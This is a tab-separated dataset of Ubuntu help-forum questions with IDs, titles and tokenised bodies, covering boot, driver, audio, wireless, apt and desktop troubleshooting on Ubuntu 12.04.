186717	strange behaviour when screencasting	since an update i did yesterday i am not able to screencast any video using kazam , recordmydesktop or even ffmpeg/aviconv . after the upgrade to some libraries ( a normal update that showed in update manager ) the problem was this : when doing the screencast , scrolling inside an apps window like firefox , chrome or gedit is not shown . the video only shows the last image it recognized before i started scrolling . for example with gedit , i have a lot of text on it and when i start to scroll down , the video only shows what i had in the beginning while i listen to myself talk about what is in the rest of the file ( which is not shown in the video ) . when opening a window , for example again gedit or chrome it might not show in the video , it will just show the desktop without the window opened . i do not see any error with dmesg , syslog or others . what can i check to debug this problem ?
186719	how to deal with `` not installable '' dependencies ?	i ran sudo apt-get install -y unity-dictionary-lens and received a warning of unmet dependencies : unity-dictionary-lens : depends : unity-singlet ( > = 0.2.0 ) but it is not installable i found the package here but could not install it .
186721	i ca n't install ubuntu 12.04.1 on imac g5	so , i have this imac g5 that does n't have isight , only a small light sensor i think undernieth , machine model 8.2 . i tried burning a ubuntu 12.04.1 powerpc 64bit .iso to a cd but the computer just wo n't boot it , i do n't know why . next i tried with a usb but it would n't let me boot that either , i created the usb on my dad 's win7 laptop as the process was way easier than on freakin mac or ubuntu ( no command typing at all on windows ) i 'm able to get into openfirmware and type boot usb and it does show some weird writing that scrolls so fast i ca n't see anything and then it just gives me this huge no sign like a stop sign and freezez . the sign is grey and the line in the middle is tilted towards the left . an other issue i 'm having with hdiutil is that i ca n't convert the stupid .iso i just downloaded into a .img because the file keeps on dissapearing right when it 's done converting it . i used the syntax from ubuntu support how to create a bootable usb drive under mac os x. i even did n't include the 2 stupid ~ that are shown in the syntax that are completly worthless , god only know why they put them there , and i even tried running the whole thing as root with sudo su before the command . the funny thing is that if i convert something smaller it works . the command i was using is hdiutil convert -format udrw -o /path/to/target.img /path/to/ubuntu.iso i even tried hdiutil convert /path/to/ubuntu.iso -format udrw -o /path/to/target.img but the same thing happens , the dummy .img.dmg file dissapears when the conversion is done no matter where i set the output file to go . i have tried several different folders , the same thing happens with all of them . i also tried burning a ubuntu mini iso on a cd , ca n't remember if it was 11.10 or 12.10 but even thoguh holding c when the imac boots up does show me the cd and i can boot from it , i get this weird error upon hitting install , it says something like invalid memory access , release keys and error strings i ca n't read . i do n't have any original dvds from this imac and ca n't run hardware diagnostics . whatever option i try at the command prompt from the mini ubuntu cd i get the same result , error code and openfirmware backdrop that 's frozen . i noticed that the pen drive i created on my dads win7 laptop is formated with ms-dos but i can still mount it no problem , so it should n't have a problem booting it , right ? i used the advice on ubuntu.com to make it , from here . also , my partition is hfs+ so i ca n't use it as a hard drive and boot from it . i don ' have 2 partitions either , just one hdd , one partition . please help ! ! !
186727	relocate mount point from new install	rookie here ! just re-installed ubuntu 12.03 server on my boot drive and it found my raid five array and assigned the following /dev/md/0 point . i would prefer to relocate the mount point to dev/md0 /mnt/nas . is this possible and how best to accomplish ? thanks in advance . bob
186730	chromium quicklist not updating , any ideas ?	i added this x-ayatana-desktop-shortcuts=user1 ; user2 [ user1 shortcut group ] name=draconis exec=chromium-browser -- enable-udd-profiles -- user-data-dir= '' /home/xiaolin/.config/chromium/default '' targetenvironment=unity [ user2 shortcut group ] name=snoozie exec=chromium-browser -- enable-udd-profiles -- user-data-dir= '' /home/xiaolin/.config/chromium/profile 1 '' targetenvironment=unity to : ~/.local/share/applications/chromium-browser.desktop then logged out and back in , even tried rebooting , also tried adding it with : gksu gedit /usr/share/applications/chromium-browser.desktop . nothing seems to work , all i get is the default quicklist .
186736	no windows boot option after installing ubuntu 12.04	i have windows on my machine and then i installed ubuntu 12.04 using usb . i was not getting the option to boot into ubuntu , so i ran boot-repair but then now i am not getting option to boot into windows . below is my paste ubuntu url . what can be the issue ? http : //paste.ubuntu.com/1199492 thanks
186738	ubuntu 12.04 install error : ubi-partman failed with exit code 141	i have installed ubuntu 12.04 on my preinstalled windows 7 sony vaio s series laptop following instructions here : http : //www.linuxbsdos.com/2012/05/17/how-to-dual-boot-ubuntu-12-04-and-windows-7/ everything went well and i am able to boot in to windows after complete installation of ubuntu . now following instructions on web i tried to add ubuntu to my bios using easy bcd ( but forget to add windows 7 entry ) . as a result , i loose windows 7 os and ca n't boot in to either os then i successfully repaired windows 7 using recovery cd . now my problem is that i ca n't reinstall ubuntu 12.04 using live cd it halts every time before disk partition step giving error . `` ubi-partman crashed '' . `` ubi-partman failed with exit code 141. further information may be found in /var/log/syslog . do you want to try running this step again before continuing ? if you do not , your installation may fail entirely or may be broken . '' and , any choice to continue will result in the same error . i looked in to /var/log/syslog but not able to understand what is error . then , i ran sudo fdisk -l to view my partitions and it shows me only one partition . probably , all the partitions i created for ubuntu 12.04 are lost while running windows 7 recovery cd . so , i do n't know whether the ubuntu is still there or probably corrupted . my boot-info url is : http : //paste.ubuntu.com/1202146/ please tell me how to remove this error so that i can reinstall/repair ubuntu 12.04 thanks in advance . r shukla my boot-info url is : http : //paste.ubuntu.com/1202146/ please tell me how to remove this error so that i can reinstall/repair ubuntu 12.04 thanks for your help ! i tried to boot from the cd but i every time it give me error before disk partitioning step . also , i am unable to start gparted . `` ubi-partman crashed '' . `` ubi-partman failed with exit code 141. further information may be found in /var/log/syslog . do you want to try running this step again before continuing ? if you do not , your installation may fail entirely or may be broken . '' and , any choice to continue will result in the same error . i looked in to /var/log/syslog but not able to understand what is error . then , i ran sudo fdisk -l to view my partitions and it shows me only ne partition . probaply , all the partitions i created for ubuntu 12.04 are lost while running windows 7 recovery cd . please tell me how to remove this error . best regards , r s
186740	apt-get update not solving the issue	w : duplicate sources.list entry http : //dl.google.com/linux/chrome/deb/ stable/main amd64 packages ( /var/lib/apt/lists/dl.google.com_linux_chrome_deb_dists_stable_main_binary-amd64_packages ) w : duplicate sources.list entry http : //dl.google.com/linux/chrome/deb/ stable/main i386 packages ( /var/lib/apt/lists/dl.google.com_linux_chrome_deb_dists_stable_main_binary-i386_packages ) w : you may want to run apt-get update to correct these problems i get this every time i do something with apt-get . how do i get rid of this error message ? edit : this is what my sources.list looks like : missingfaktor @ going-merry /etc/apt/sources.list.d $ cat /etc/apt/sources.list # /etc/apt/sources.list # deb http : //badgerports.org lucid main # deb-src http : //badgerports.org lucid main # deb http : //repository.glx-dock.org/ubuntu maya cairo-dock # # cairo-dock-stable
186746	ubuntu-tweak login background	i changed my login wallpaper to an image , which is different from my desktop background , using ubuntu tweak . when i logout/restart , it briefly displays the changed background , but fades to the old desktop background .
186747	why umask 077 does not allow user to execute files/directories ?	i 'm using umask 077 . `` other '' and `` group '' do not have any rights , but user ca n't execute files/directories . why umask 077 does not allow user to execute files/directories ?
186756	google chrome causing file system to mount as read only	so disclaimer , i am using lubuntu 12.04 but i 'm almost certain it should n't make any difference . earlier this week i resized my lubuntu partition on my harddrive with gparted to be 25 gbs smaller , the rest being unallocated space . this is when my problem begin . i have then since resized the lubuntu partition back to being the full size of my harddrive ( minus swap , etc . ) but the problem still persists . i noticed after the resizing that when using google chrome and trying to download files i was getting download errors . after such errors would occur my / directory would be mounted as `` read-only '' . for example trying to create a directory would prompt error creating directory : read-only file system it seems to only occur either by downloading something from chrome and then trying to put it in the trash or downloading something from chrome and then closing chrome . as any combination of downloading things , deleting them , or closing a program does n't cause this error if i 'm say using firefox or epiphany . i have tried repairing the file system with fsck -yfv /dev/sda1 while using a live cd but unless the `` read only '' error had occurred the previous boot it does n't find any errors . same with when i boot the system , if the `` read only '' error had occured previous boot , lubuntu finds and tries to fix the file system error on boot . after which the file system works and is read/write again . i have also tried reinstalling chrome with sudo apt-get purge google-chrome-stable and then sudo apt-get install google-chrome-stable to no avail . i apologize if this is too verbose , but any help would be greatly appreciated . edit : here is the dmesg output when the error occurs [ 803.965630 ] ext4-fs error ( device sda1 ) : ext4_ext_search_left:1224 : inode # 655737 : comm flush-8:0 : ix ( 3646 ) ! = ext_first_index ( 0 ) ( depth 0 ) ! [ 803.965643 ] aborting journal on device sda1-8 . [ 804.017792 ] ext4-fs error ( device sda1 ) : ext4_journal_start_sb:327 : detected aborted journal [ 804.017796 ] ext4-fs ( sda1 ) : remounting filesystem read-only [ 804.017975 ] ext4-fs ( sda1 ) : remounting filesystem read-only [ 804.017986 ] ext4-fs error ( device sda1 ) in ext4_da_writepages:2317 : io failure [ 804.019268 ] ext4-fs ( sda1 ) : ext4_da_writepages : jbd2_start : 1023 pages , ino 655737 ; err -30 [ 900.184077 ] ce : hpet increased min_delta_ns to 20113 nsec
186758	drracket icon doesnt work ?	i installed drracket from the ubuntu software center . all went well and an icon appeared however nothing happened when i clicked the icon so i removed it . then went to the developer website and downloaded full-5.3.0.21-bin-x86_64-linux-debian-squeeze.sh . i installed this via terminal with sudo apt-get install racket . the drracket icon came back in dash home but again clicking it nothing appears to happen . how do i start drracket ? i am running ubuntu 12.04 lts dual boot on a 64 bit dell
186761	menu bar time disappeared	hello can anyone help me , my time on the menu bar has disappeared , one day i noticed it was gone , in system settings i do not have a time and date option either . i am running ubuntu 12.04 , please help
186771	telnet escape character , norwegian keyboard	here 's me in gnome-terminal , using telnet . as it says `` escape character is '^ ] ' i 've no idea which keys to hit , ctrl ] , ctrl ă , ctrl ^ does nothing . this is the keyboard layout of norwegian keyboards - which keys do i hit to get to the telnet escape prompt ?
186779	why did adobe stop flash player for linux ?	i have heard adobe claims they stopped developing flash player for linux in an effort to get more people to make stuff in html5 . what they have done , is forced me to use windows more . if their excuse is really what they claim , then why do n't they stop developing flash for windows or mac ? would n't you think that is more effective ? also , if i were to install windows version of flash in wine , would that help the flash games i play be less glitchy ?
186781	to windows 7 from ubuntu	so i just installed ubuntu on my families desktop , everybody loves it except my brother . when i restart my computer it does n't give me the option to pick ubuntu or windows 7 . so i 'm lost ( i have all my windows 7 stuff on my drives so i definitely ran them side by side ) so how do i switch back to windows ?
186787	grub and making windows the default os	so i need to make my default os windows 7 . i was told i would have to use grub but it 's proving to be pretty difficult ... how could i accomplish this task of changing my default os ?
186789	ca n't customize the application switcher	i 'm trying to change the shortcut for switching applications from alt+tab to ctrl+tab , but changes in the system settings > keyboard > shortcuts > navigation are being ignored . even if i disable the switch applications shortcut entirely , it still maps to alt+tab . at one point i had some keys remapped with xmodmap , but since then i have deleted that configuration and rebooted . my keyboard layout settings are all defaults . the os is ubuntu 12.04 , with all software updated this afternoon . it would also be nice to have the variation of application switching that includes one icon per window , instead of one icon per application , since i am frequently switching between windows of an application and would rather not wait for the switcher to realize i want a different window of the current application . my other ubuntu 12.04 install has the application switcher that i like , but i 'm not sure how to choose between them on this install ( which was set up by my university department ) . thanks if anyone can help me with this .
186791	how to access files in windows partition from ubuntu live usb ?	i run ubuntu from a usb ( run the whole os from it , persistent ) and want to access files such as my pictures or documents from windows 7 , is it possible to do so ? how ?
186797	what is this ps1 variable doing in .bash_profile file ?	currently my terminal prompt looks like : blankman-macbook-pro : ~ $ my .bash_profile has : export ps1= '' \ [ \033 [ 36m\ ] \h : \w \ [ \033 [ 33m\ ] \ $ ( parse_git_branch ) \ [ \033 [ 00m\ ] \ $ ( git config user.initials ) $ \ [ \033 [ 00m\ ] `` export sudo_ps1='\ [ \e [ 0 ; 31m\ ] \u\ [ \e [ m\ ] \ [ \e [ 1 ; 34m\ ] \w\ [ \e [ m\ ] \ [ \e [ 0 ; 31m\ ] \ $ \ [ \e [ 0m\ ] ' does this make sense ?
186798	how to create/edit/remove a group in empathy	in 12.04 with empathy 3.4.2.3 i ca n't seem to find the options for adding , removing or even editing a group . are there still there or moved where ?
186801	restoring nvidia drivers from `` older version of ubuntu '' to new version on disk ? both 12.04 on sony vaio	i selected one of the alternative nvidia drivers on my sony vaio from the additional drivers application . that ruined my installation and all i get is the login prompt at bootup . however i can go in at bootup by selecting `` older ubuntu versions '' and selecting whatever was there before . this older version has the correct drivers ( nvidia accelerated graphics driver 173 ) which i 'm using right now . is there file in the `` new '' ( broken ) system where i can replace the nvidia driver entry from the `` old '' system i 'm using ( which works fine ) without having to reinstall ubuntu from scratch ? or can i reinstall ubuntu without losing all my files and settings ? or what are my alternatives ?
186803	recover from losing personal pgp	the computer i was using which is the one i used to sign the ubuntu code of conduct got a hardware problem and i lost it . if i want to continue my work on launchpad , how can i proceed to recover , recreate or reset the whole process so that i can relate my pc again to launchpad with the pgp ?
186805	difference between pgp and gpg	what are the main differences between pgp ( pretty good privacy ) and gpg ( gnu privacy guard ) in relationship with security in ubuntu and launchpad ?
186808	every command fails with `` command not found '' after changing .bash_profile ?	i was updating my .bash_profile , and unfortunetly i made a few updates and now i am getting : env : bash : no such file or directory env : bash : no such file or directory env : bash : no such file or directory env : bash : no such file or directory env : bash : no such file or directory -bash : tar : command not found -bash : grep : command not found -bash : cat : command not found -bash : find : command not found -bash : dirname : command not found -bash : /preexec.sh.lib : no such file or directory -bash : preexec_install : command not found -bash : sed : command not found -bash : git : command not found my bash_profile actually pulls in other .sh files ( sources them ) so i am not exactly sure which modification may have caused this . now if i even try and to a list of files , i get : > ls -bash : ls : command not found -bash : sed : command not found -bash : git : command not found any tips on how to trace the source of the error , and how to be able to use the terminal for basic things like listing files etc ?
186813	why does every directory have a size 4096 bytes ( 4 k ) ?	as the subject says ; i want to know why is every directory having a size equals to 4k even if they contain files with sizes greater than 4k . please have a look at the following : - a ) b ) ps : i am aware of 'du -sh ' command line utility . edit : i am assuming directory as a container for files .
186822	audio stopped working suddenly in 12.04	my audio is no longer working in xubuntu 12.04 after working fine for about a year . this happened right after visiting the following website and installing an audio browser application to upload voice samples for the creation of an open-source speech recognition program : http : //www.voxforge.org/home/read i do not know if that is what caused the problem , but audio stopped working around the same time i installed this web application . when i type in the terminal pulseaudio -d i get the following : e : [ pulseaudio ] main.c : daemon startup failed . i tried the following next : sudo apt-get purge pulseaudio sudo apt-get install pulseaudio when i type 'pulseaudio ' at the command prompt , i get : e : [ pulseaudio ] pid.c : daemon already running . e : [ pulseaudio ] main.c : pa_pid_file_create ( ) failed .
186829	wireless not working on desktop with asus usb-n13 ( b1 ) wireless adapter	i am trying to connect my desktop to a wireless network . i have purchased an asus usb-n13 b1 adapter . i have followed instructions for installing drivers and disabling conflicting drivers . i have thoroughly searched and could not find a solution . the adapter is recognized and powered on . i have entered the ssid and password information into the wireless network configuration . other machines can connect to this wireless network , and the machine can connect online via ethernet without issue . here is the output of some commands which summarize my configuration , and might give some clues : ~ $ cat /etc/lsb-release distrib_id=ubuntu distrib_release=12.04 distrib_codename=precise distrib_description= '' ubuntu 12.04.1 lts '' ~ $ uname -a linux petra 3.2.0-29-generic # 46-ubuntu smp fri jul 27 17:03:23 utc 2012 x86_64 x86_64 x86_64 gnu/linux ~ $ lsusb bus 001 device 006 : id 0b05:17ab asustek computer , inc. ~ $ dmesg [ 1883.823150 ] wlan0 : authenticate with 48:5b:39 : e7:25:5e ( try 1 ) [ 1884.020027 ] wlan0 : authenticate with 48:5b:39 : e7:25:5e ( try 2 ) [ 1884.220025 ] wlan0 : authenticate with 48:5b:39 : e7:25:5e ( try 3 ) [ 1884.420023 ] wlan0 : authentication with 48:5b:39 : e7:25:5e timed out any assistance would be appreciated as i have been trying to get this machine online for several weeks now to no avail . sincerely , michael . update : running some commands to test for a blocked wireless adapter , as suggested in the answers , seems to indicate that blocking is not the problem ~ $ rfkill list all 1 : phy1 : wireless lan soft blocked : no hard blocked : no ~ $ rfkill unblock all ~ $ sudo service network-manager restart network-manager stop/waiting network-manager start/running , process 3839 the system periodically prompts me to re-enter the network password , despite never successfully connecting . i am not making any errors in entering the network information . this network has a repeater . is it possible that the repeater is somehow causing a problem with the connection , by having two hardware devices for the same network ? any additional help would be greatly appreciated update : changed the wireless setup to wpa ( used to be wep ) . this seems unlikely to be the root of the problem but at least wpa is more secure . after this change , and disabling ipv6 , i feel that the system is closer to working . now , network manager will start on startup even if the machine is not plugged in to a wired connection . wireless seems to start and i can see several of the networks available in my area . also , it will try to connect to the network about 3 times ( prompting for a password each time ) . after the third time , it gives up and disables wireless . some guesses then , are : -- signal strength is too low . this is unlikely as the problem persists even with the repeater very near the adapter -- confusion relating to the repeater : two sources with different mac addresses ? perhaps it is alternately trying to connect to the main router and the repeater or something , and getting confused ? -- configuration or driver problems ? -- device is just plain broken ? some interesting behavior that may help get to the root of the problem . if i start up the computer with both the wireless adapter and a wired connection to the repeater , i am able to get internet connectivity , even after disconnecting the wired connection . however , this wired connection seems to be necessary to initiate a working wireless connection , as the machine can not connect until the wired connection is first established . if i reboot the machine , connectivity is lost . if i reboot the repeater , connectivity is also lost . update : cross posted to ubuntu forums , but no new information there yet . i 'm going to try stepping through the installation process from the beginning again . ( i had some more updates but they were lost due to unreliable internet connectivity , basically , re-installing from scratch failed due to compile errors and none of several fixes that i found worked ) you would think that this would be a good sign , but there is no wireless connectivity : wlan0 ieee 802.11bg essid : '' [ [ redacted ] ] '' nickname : '' < wifi @ realtek > '' mode : managed frequency:2.437 ghz access point : 48:5b:39 : e7:25:5e bit rate:54 mb/s sensitivity:0/0 retry : off rts thr : off fragment thr : off power management : off link quality=100/100 signal level=100/100 noise level=0/100 rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 update : i do n't know why , but if i boot without the wired connection and then run sudo service network-manager restart once the computer starts up , i seem to get a wireless connection . so , it looks like its just a matter of making sure the wireless starts correctly . i 'm not sure how to explain other behaviors , but i feel like i 'm closer to a solution .
186830	top bar in ubuntu 12.04 gnome classic is missing	the top ( title ) bar which includes file , edit , view is missing in gnome classic on ubuntu 12.04 . on switching to unity and normal gnome 3 , the top bar was usually merged with the menu bar , akin to mac os interface . however , i am using the gnome classic version . can anybody tell me how to enable the top ( title ) bar of applications ?
186837	problem with the allocated partition memory	i installed ubuntu 12.04 using wubi on to a 60gb partition . i installed qt sources , which are a couple of gb in size , but once i start commpiling it started complaining about lack of memory . i checked the size of the partition and it said it has 30gb remaining , but then checked the properties of the home folder and it said 9.9gb remaining . i 'd appreciate , if someone could explain and help me to sort this out . i have attached a screenshot below . thank you in advance . some details of the system are as follows .
186838	12.04.1 cd not recognized as a boot disk	i 'm trying to install ubuntu 12.04.1 x64 as a standalone os . i can not get the laptop to recognize the cd as a boot disk . the chipset is an intel t5500 which is x64 architecture ( have also tried the 32bit , and slowest burn possible ) . if i use a windows disk ( i have tried windows 7 32 , 64 ultimate ) , i have no problems at all and windows loads and installs . i have also run ubuntu side by side through the windows installer and it worked perfectly ( now i just want a standalone install ) . any help is greatly appreciated .
186840	stacked launcher item double click behaviour on alt-tab	let 's say that you have multiple firefox windows open . what you see happen is an additional arrow points to it 's icon in the launcher . however , if you double click the icon , it displays all of the windows in a spread out fashion , similar to the behaviour from pushing super + w , but only for that program group . is it possible to make this window spreading behaviour occur with alt-tab ? ps : no idea what tags i should use , or if the language ( jargon ) in the title or question is appropriate .
186842	how to fix boot error for install on a raid 5 configuration	i 'm trying to install ubuntu onto a 6tb virtual disk ( 3 3tb drives in a raid 5 configuration ) . i thought i had it all ready to go . but it does n't boot . so , then i tried boot-repair , which claimed to fix problem . but it did n't . you can find the log here : http : //paste.ubuntu.com/1199948/ any suggestions ? thanks !
186843	how can i learn ccna using ubuntu instead windows oss	i just begin course of ccna and i just notice that all work on windows .. so my question have two parts first , can i learn and training on ccna using linux /ubuntu ? ? second . if yes , how can i use it and is there any changes in writing order and cisco packet tracer
186844	bug in unity 3d	when i am running unity 3d after a short time ( less than a day ) my machine becomes too slow to be usable . switching a tab in firefox takes minutes . checking 'top ' compiz is using ~90 % of cpu at the time . where can i report this as a bug ? cheers worik
186847	`` error : gnutls_handshake ( ) falied '' when connecting to https servers	when i try to connect to any https server with git , it gives the following error : error : gnutls_handshake ( ) failed : a tls packet with unexpected length was received . while accessing ... fatal : http request failed i think that maybe some packages that are related to gnutls_handshake has been broken . so , i want to reinstall those packages , which packages can be related to these errors ? or how do i fix this kind of error ?
186850	how to import settings and files from old hd/smaller to new hd/1tb	i upgraded from a smaller hd to a larger hd , for now i have both hd 's , but plan on getting rid of the older hd ... also the newer drive is a dual boot with windows . i waited for the import settings and files part of the new install on the new hd to come up , and it did come up , but it showed absolutely nothing . so now i need to figure out a way to import all those settings and files and etc ... so i can take the older/smaller drive off of this box . i now have two copies of ubuntu 12.04 , one on the older/smaller drive and one on the newer/larger drive .
186853	bluetooth worked in live mode , but not after installation .	i have a lenovo g580 laptop . bluetooth works fine when i 'm running ubuntu live . but after i installed it on my laptop , it says no bluetooth device detected . please help me solve the issue .
186855	how to add a custom driver to my kernel ?	i want to add a custom driver to my kernel source . but i have no idea how to do this . any help will be appreciated . thanks .
186865	how do i start a program automatically when i boot ?	i am using ubuntu 12.04 and i always have to start for example yakuake by myself . how can i start the program automatically on boot ?
186867	how can i print a pdf document on multiple pages ?	i 'd like to print a single page pdf document on 2 or 4 pages . is there a way to do that on ubuntu 12.04 ?
186869	does scientific workplace work with ubuntu 12.04 ?	before passing to linux ubuntu 12.04 i used to have a partition for windows in which i used to work with scientific workplace ( sw from now on ) ; now i do not have a partition no more and i am a `` ubuntu-one-way-user '' . is there a way to make sw run also on ubuntu 12.04 ? if yes , tell me there is a method which is different from wine , because in my case wine is not working . tanks in advance .
186871	epson stylus office bx305fw plus how to scan	i have a epson stylus office bx305fw plus , but i do n't now where the scan option is in the default printer application in ubuntu how can i scan with my printer ?
186876	how to remove the old driver for canon mx870 and install a new one ?	i am using 12.04 . in addition to canon mx870 printer only shows `` processing '' on the status lcd , i 'm not sure if i successfully removed the old mx870 driver ( i removed it by using ubuntu software center ) , then i added a new ppa , apt-get update and then : $ sudo add-apt-repository ppa : michael-gruz/canon-trunk $ sudo apt-get update $ sudo apt-get install cnijfilter-mx870series reading package lists ... done building dependency tree reading state information ... done package cnijfilter-mx870series is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'cnijfilter-mx870series ' has no installation candidate how could i resolve this ? edit : it seems to me like a ppa issue : $ sudo add-apt-repository -r ppa : michael-gruz/canon-trunk $ sudo add-apt-repository ppa : michael-gruz/canon-trunk $ sudo apt-cache policy ppa : michael-gruz/canon-trunk n : unable to locate package ppa : michael-gruz/canon-trunk /etc/apt/sources.list.d $ **find . -name `` *michael* '' ./michael-gruz-canon-trunk-precise.list ./michael-gruz-canon-trunk-precise.list.save $ grep -lr mx870 no results .
186880	ca n't convert .iso to .img on imac g5	so i 'm trying to create a bootable usb stick in order to install ubuntu 12.04.1 on my imac g5 running mac os x 10.4.11 but whenever i try to convert the downloaded .iso file into a .img , the .img.dmg file that the terminal creates just suddenly dissapears no matter where i select the output file to be . i tried hdiutil convert -format udrw -o /path/to/target.img /path/to/ubuntu.iso and also hdiutil convert /path/to/ubuntu.iso -format udrw -o /path/to/target.img but the exact same thing happens . i tried becoming root before i do all of this with sudo su but i still get the same results . the totally weird thing is that it works perfectly with ubuntu minimal .iso files . could it be that the .iso i downloaded is corrupt ?
186883	ca n't boot freshly burned ubuntu cd	so i just burned a ubuntu 12.04.1 powerpc .iso on a cd for my imac g5 running mac os x 10.4.11 and it wo n't even recognize the cd . i burned it on my dad 's windows 7 laptop as the process is way easier ( just 2 clicks ) . mac os x 10.4.11 gives me an error when it starts and when the cd is in saying `` the disk you inserted was not readable by this computer '' . what 's funny is that i burned a ubuntu minimal .iso on a cd and it would totally read that and even boot it though it gave me some errors afterwards and i could n't install . i even tried going into openfirmware and hitting boot cd : ,\tbxi but i get the error `` warning sector size mismatch ca n't open cd : ,\tbxi ca n't open device or file '' was there something wrong with the .iso i burned ? mac os x 10.4.11 wo n't even mount that .iso it tells me that the hfs file system is corrupt or something , but i know the .iso does n't contain hfs file system . any help ? i downloaded the .iso from http : //cdimage.ubuntu.com/releases/precise/release/ubuntu-12.04-desktop-powerpc.iso
186884	after changing compiz configuration , i ca n't use account	i think i have made some changes in compiz and now i ca n't see anything on the screen when i log in with a user . for the other users everything is ok. is there any possibility to reset to default compiz ? all i can do logged in as the user with problems is pressing ctrl-alt-f2 , and then i have to log in a terminal . i 'm not at all a power user , so i apologies if my question is not very clear . thanks in advance
186889	creation of /proc/stat	which function of the kernel creates and writes the information for /proc/stat . in this , would like to know when kernel gets the cpu information ( recognises number of cpus ) . if possible can anyone explain when exactly kernel knows ( reads ) cpu count at boot time ? thanks in advance .
186890	show only the active workspace on the launcher	is there a way in 12.04 to show only icons that are active on the current workspace
186892	synchronize kmail and korganizer with my google data	is there a way to synchronize kmail and korganizer with my google data ?
186894	ca n't log in to google through lightread	i need some help from you ... after googling for 2 days , i 'm unable to login into my google reader acount using lightread , i do n't have google two factor authentification active so i do n't have any idea of what it could be ... your help will be much apreciated , thank you !
186895	how to enable two finger scrolling on lenovo thinkpad t400/w540	it is disabled ( greyed out ) in mouse and touchpad settings . edge scrolling works though : ) tried many solutions available online but could n't succeed . my touchpad is synps/2 synaptics touchpad
186902	google chrome does n't render the fonts properly .	i have attached an image of the badly rendered font . this started happening after upgrading 12.04 ( i was on 10.10 before that ) . the chrome version is version 22.0.1229.39 beta . font for the text in multi-color is `` callunablack '' . if i change it to arial or times new roman , it is displayed correctly . the problem may be limited to webfonts . initially i had problem with many fonts . taking hint from some earlier answers , i created .fonts.conf as below . this helped in getting the regular fonts rendered correctly . < ? xml version= '' 1.0 '' ? > < ! doctype fontconfig system `` fonts.dtd '' > < fontconfig > < match target= '' font '' > < edit mode= '' assign '' name= '' rgba '' > < const > none < /const > < /edit > < /match > < match target= '' font '' > < edit mode= '' assign '' name= '' hinting '' > < bool > true < /bool > < /edit > < /match > < match target= '' font '' > < edit mode= '' assign '' name= '' hintstyle '' > < const > hintslight < /const > < /edit > < /match > < match target= '' font '' > < edit mode= '' assign '' name= '' antialias '' > < bool > true < /bool > < /edit > < /match > < match target= '' font '' > < edit mode= '' assign '' name= '' lcdfilter '' > < const > lcdlegacy < /const > < /edit > < /match > < /fontconfig > i tried different options for the parameters here but no success . everything looks good on firefox
186912	how to use notification area ( system tray ) over indicators in xubuntu ?	xubuntu has both notification area ( system tray ) and indicators . i prefer the first one , as it allows me to hide items . is there any way to force the apps that support both ( e.g . tomboy , dropbox etc ) to display their icons in the system tray and not their indicators ?
186913	how do i disable visual effects in ubuntu 12.04.1 ?	so i finally managed to install ubuntu 12.04.1 on my g5 imac but i do n't want any fancy visual effects . how do i disable those ? my user logs in automatically and i ca n't find anything in system settings , there is no visual effects tab inside the appearance applet . i would like to keep the nice unity shell but just disable visual effects so that the quartz part of my video card does n't get used . thanks !
186918	how can i get my onboard mic to work while i 'm using my amd video card for sound playback ?	this is a really annoying issue that no one seems to have the answer for . i 'm using the audio of my hdmi sound card ( its a radeon hd 5450 ) to hear sound and it works when i 'm listening to music or watching things online . but while i have that as the default device for playing audio , my microphone port on my gigabyte ga-z77-ds3h is silent . it registers sound when i look under sound settings , that little orange bar flicks up and down at the strum of a bass note but i hear nothing no matter what i do . if anyone can help i 'd be so grateful .
186921	gnome 3 right click compress option missing	i have what the title says . i show this answer but the file-roller has only folders `` general '' and `` listing '' and i did n't show an option to add right click compressing .
186924	home directory paths in unity launcher	i am trying to have a relative path to my home directory in my launcher script . example ( working ) : exec=terminator -x /home/patrick/dropbox/system/scripts/belzebub2hanibal.sh example ( not working ) : exec=terminator -x ~/dropbox/system/scripts/belzebub2hanibal.sh is there any way to use variables for the home directory of the current user in a launcher script ?
186926	how to install toggl desktop client ?	can anyone tell how to install toggl desktop client on ubuntu ?
186927	cairo dock can not update !	i have installed cairo dock installed version : 3.0.0.1-0ubuntu1.1 on the update manager its showing update avilable as available version : 3.0.2-1ubuntu0~precise but when i click install updates its show me attached image ! so what i have to do if i have update cairo dock to the latest version ?
186929	how do i get sound to work on my imac g5 running ubuntu 12.04.1 ?	when i click the sound icon i only have a dummy output device there . i have a g5 imac i think model 8,7 . i am running ubuntu 12.04.1 for powerpc64 thanks
186932	fix missing kde oxygen icons on ubuntu 12.04	i 've upgraded from ubuntu 11.10 to 12.04 and used the kde human theme in 11.10 . after upgrade i switched back to oxygen-icon-theme and many kde icons are still missing . i 've already tried to reinstall oxygen-icon-theme . here a screenshot from german krusader menu . you see a lot of icons missing . how to restore default ubuntu 12.04 kde icons ?
186933	how to recover a lost partition on ubuntu ?	i had two linux os installed on my machine : backtrack 5 gnome and backtrack5 kde . i updated the gnome version and when i rebooted my grub2 boot manager displayed a grub rescue > command line . i then installed ubuntu on the same partition with the kde version to recover my boot-loader . i successfully got the grub working but unfortunately the kernel for the gnome os version does n't show neither the partition when i set the machine up . ubuntu is great now but i need some files on the ghost partition . please help me retrieve it .
186936	how do i get wi-fi to work on my imac g5 ?	i have an imac g5 model 8,7 with airforce one 54g broadcom bcm4318 wi-fi but it does n't work , the wireless menu tells me that the firmware is missing . i am running ubuntu 12.04.1 for powerpc64 . please help , i really need it to work ! ! !
186939	software center does n't work as it should in awesome wm	i am using ubuntu 12.04 and awesome window manager . when i run software-center i can not install or remove software . i get the following warning : softwarecenter.backend - warning - _on_trans_error : org.freedesktop.policykit.error.failed : ( 'system-bus-name ' , { 'name ' : ':1.105 ' } ) : org.debian.apt.install-or-remove-packages it worked just fine outside awesome wm . i searched on google/askubuntu and found this post , which seemed to had the solution ( gksudo software-center & exit ) . now i can install new software , but i ca n't view or search my installed software . the page just keeps showing the loading icon , but wo n't ever load . i do n't get any warnings or errors . just to be clear , installing/removing/searching using synaptics/apt-get/dpkg works just fine .
186943	how to download multiple files using an script	i have to download multiple files from here in googlecode . currently i open each folder and download each file by saving it using my browser . is there a way to automatically download all folder/files ?
